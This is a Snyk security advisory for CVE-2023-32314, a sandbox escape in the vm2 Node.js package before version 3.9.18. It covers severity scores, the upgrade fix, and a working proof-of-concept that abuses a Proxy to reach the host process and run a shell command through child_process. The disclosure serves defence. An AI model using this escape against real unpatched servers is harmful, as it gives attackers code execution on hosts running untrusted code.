Sandbox Bypass Affecting vm2 package, versions <3.9.18
Snyk CVSS
Attack Complexity
Low
Confidentiality
High
Integrity
High
Availability
High
Threat Intelligence
Exploit Maturity
Proof of concept
EPSS
0.54% (77th
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-JS-VM2-5537100
- published 16 May 2023
- disclosed 15 May 2023
- credit Takeshi Kaneko
Introduced: 15 May 2023
CVE-2023-32314 Open this link in a new tabHow to fix?
Upgrade vm2
to version 3.9.18 or higher.
Overview
vm2 is a sandbox that can run untrusted code with whitelisted Node's built-in modules.
Affected versions of this package are vulnerable to Sandbox Bypass by abusing an unexpected creation of a host object based on the maliciously crafted specification of Proxy
.
Exploiting this vulnerability allows an attacker to gain remote code execution rights on the host running the sandbox via the Function
constructor.
PoC
const { VM } = require("vm2");
const vm = new VM();
const code = `
const err = new Error();
err.name = {
toString: new Proxy(() => "", {
apply(target, thiz, args) {
const process = args.constructor.constructor("return process")();
throw process.mainModule.require("child_process").execSync("echo hacked").toString();
},
}),
};
try {
err.stack;
} catch (stdout) {
stdout;
}
`;
console.log(vm.run(code)); // -> hacked